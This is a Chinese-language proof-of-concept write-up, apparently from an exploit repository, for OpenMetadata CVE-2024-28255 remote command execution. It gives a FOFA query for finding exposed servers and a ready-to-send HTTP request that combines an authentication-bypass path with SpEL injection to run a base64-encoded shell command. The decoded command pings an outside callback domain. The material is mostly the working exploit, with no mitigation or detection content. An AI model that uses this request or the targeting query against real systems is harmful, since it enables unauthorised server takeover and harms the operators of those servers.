POC/wpoc/OpenMetadata/OpenMetadataCVE-2024-28255命令执行漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

32 lines
1.7 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# OpenMetadata CVE-2024-28255 命令执行漏洞
# 一、漏洞简介
OpenMetadata是一个用于数据治理的一体化平台可以帮助我们发现协作并正确的获取数据。其提供了数据发现、数据血缘、数据质量、数据探查、数据治理和团队协作的一体化平台。它是发展最快的开源项目之一拥有充满活力的社区并被各行业垂直领域的众多公司采用。 OpenMetadata 由基于开放元数据标准和API 的集中式元数据存储提供支持支持各种数据服务的连接器可实现端到端元数据管理让您可以自由地释放数据资产的价值。其condition接口存在CVE-2024-28255远程命令执行漏洞可被攻击者接管服务器。
# 二、影响版本
+ OpenMetadata
# 三、资产测绘
+ fofa`icon_hash="733091897"`
+ 特征
![1714216467929-a292c9d9-b9e2-44ff-9e43-9b167be9754a.png](./img/sj9XAYKGaL4hMSo3/1714216467929-a292c9d9-b9e2-44ff-9e43-9b167be9754a-611877.png)
# 四、漏洞复现
执行的命令需base64编码
```plain
GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22cGluZyB3YnJ6ZmtxamN5LmRncmgzLmNu%22))) HTTP/1.1
Host:
User-Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Connection: close
```
![1714216506355-e0737ddc-db9a-46fd-a0e8-7de860167cb0.png](./img/sj9XAYKGaL4hMSo3/1714216506355-e0737ddc-db9a-46fd-a0e8-7de860167cb0-461663.png)
> 更新: 2024-04-28 16:11:56
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pz2p78tho923aukc>